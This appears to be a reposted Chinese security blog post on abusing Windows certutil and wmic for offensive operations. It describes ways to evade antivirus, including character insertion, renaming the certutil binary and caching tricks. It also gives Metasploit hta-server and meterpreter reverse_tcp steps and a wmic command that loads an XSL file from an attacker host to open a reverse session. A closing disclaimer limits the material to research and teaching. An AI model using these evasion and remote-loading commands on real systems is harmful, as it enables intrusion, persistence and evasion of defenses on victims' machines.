“A9 Team 甲方攻防团队,成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域,持续分享安全运营和攻防的思考和实践。”
01
—
Certutil介绍
操作介绍
这个时候可以利用windows 的特性,无视 ; “ ^ @ 等字符,通过组合方式绕过,如图:
可以正常运行下载,不被windows defender查杀,接下来尝试测试绕过杀软的检测。安装环境后测试,发现直接输入和代码混淆都会被检测到。
此时我们可以尝试用windows 的另一个指令来进行绕过,通过copy命令将certuil 程序复制并用不同名字来命名,然后再执行指令后,杀软无法进行检测。
但是以上的各种方式在另一款杀软均被检测识别,无法执行成功
这时候可以通过certutil 指令的可选参数 DeleteHelloContainer ,将文件下载为缓存文件,在将缓存文件恢复回原文件,且不会被杀软检测到。
操作介绍
攻击机kali生成hta文件,并开启监听。
use exploitwindowsmischta-serverset payload windowsmeterpreterreverse_tcprun
个人主机新建test.xsl 文件,并将hta文件路径写入
靶机使用wimic 命令远程加载test.xsl文件
Wmic process get brief /format:”http://xx.xxx.x.xxx:8900/test.xsl”
攻击机成功反弹sessions
原文始发于微信公众号(A9 Team):【A9】certutil,wmic命令执行敏感操作
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论